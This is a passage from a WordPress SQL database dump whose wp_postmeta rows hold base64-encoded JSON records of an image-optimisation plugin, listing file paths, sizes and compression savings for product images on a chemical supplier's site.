TR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9UaXJlcy1SZWxlYVN5cy0tMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9UaXJlcy1SZWxlYVN5cy0tMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9UaXJlcy1SZWxlYVN5cy0tMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgxMDEsImlkIjoyOTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9UaXJlcy1SZWxlYVN5cy0tNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9UaXJlcy1SZWxlYVN5cy0tNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9UaXJlcy1SZWxlYVN5cy0tNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgxMDQsImlkIjoyOTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9UaXJlcy1SZWxlYVN5cy0tNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9UaXJlcy1SZWxlYVN5cy0tNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9UaXJlcy1SZWxlYVN5cy0tNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgxMDcsImlkIjoyOTR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30261, 291, 'wpfc_optimisation_reduction', '12624'); 
INSERT INTO `wp_postmeta` VALUES (30262, 291, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy5qcGciLCJ3aWR0aCI6NDE3MSwiaGVpZ2h0IjoyNzQ5LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTg4MTEyLCJpZCI6IjI5MSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1NDQsInRpbWUiOjE0ODM1ODgxMTYsImlkIjoyOTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtODAweDUyNy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUyNywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy04MDB4NTI3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTgwMHg1MjcuanBnIiwicmVkdWN0aW9uIjoxMDg5LCJ0aW1lIjoxNDgzNTg4MTIwLCJpZCI6MjkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTc2OHg1MDYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtNzY4eDUwNi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy03Njh4NTA2LmpwZyIsInJlZHVjdGlvbiI6MTExMCwidGltZSI6MTQ4MzU4ODEyNCwiaWQiOjI5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy0xNjAweDEwNTUuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA1NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy0xNjAweDEwNTUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtMTYwMHgxMDU1LmpwZyIsInJlZHVjdGlvbiI6MzYyOCwidGltZSI6MTQ4MzU4ODEyOCwiaWQiOjI5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUxOSwidGltZSI6MTQ4MzU4ODEzMiwiaWQiOjI5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQzOCwidGltZSI6MTQ4MzU4ODEzNSwiaWQiOjI5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ4MCwidGltZSI6MTQ4MzU4ODEzOCwiaWQiOjI5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjg3MiwidGltZSI6MTQ4MzU4ODE0MiwiaWQiOjI5MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDI3LCJ0aW1lIjoxNDgzNTg4MTQ1LCJpZCI6MjkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0NzgsInRpbWUiOjE0ODM1ODgxNDksImlkIjoyOTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjU5MSwidGltZSI6MTQ4MzU4ODE1MiwiaWQiOjI5MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjM0LCJ0aW1lIjoxNDgzNTg4MTU2LCJpZCI6MjkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo3MTksInRpbWUiOjE0ODM1ODgxNTksImlkIjoyOTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BaXJwbGFuZS1DYWJpbi1SZWxlYVN5cy02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0FpcnBsYW5lLUNhYmluLVJlbGVhU3lzLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWlycGxhbmUtQ2FiaW4tUmVsZWFTeXMtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEwOTUsInRpbWUiOjE0ODM1ODgxNjMsImlkIjoyOTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30263, 289, 'wpfc_optimisation_reduction', '13664'); 
INSERT INTO `wp_postmeta` VALUES (30264, 289, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUuanBnIiwid2lkdGgiOjU0NzIsImhlaWdodCI6MzY0OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4ODE2OCwiaWQiOiIyODkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NDk4LCJ0aW1lIjoxNDgzNTg4MTcyLCJpZCI6Mjg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6OTgyLCJ0aW1lIjoxNDgzNTg4MTc2LCJpZCI6Mjg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6OTI4LCJ0aW1lIjoxNDgzNTg4MTc5LCJpZCI6Mjg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo1MTk2LCJ0aW1lIjoxNDgzNTg4MTg0LCJpZCI6Mjg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTE0LCJ0aW1lIjoxNDgzNTg4MTg3LCJpZCI6Mjg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDUyLCJ0aW1lIjoxNDgzNTg4MTkwLCJpZCI6Mjg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQm9yb24tbml0cmlkZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDU4LCJ0aW1lIjoxNDgzNTg4MTk0LCJpZCI6Mjg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Jvcm9uLW5pdHJpZGUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9Cb3Jvbi1uaXRyaWRlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWc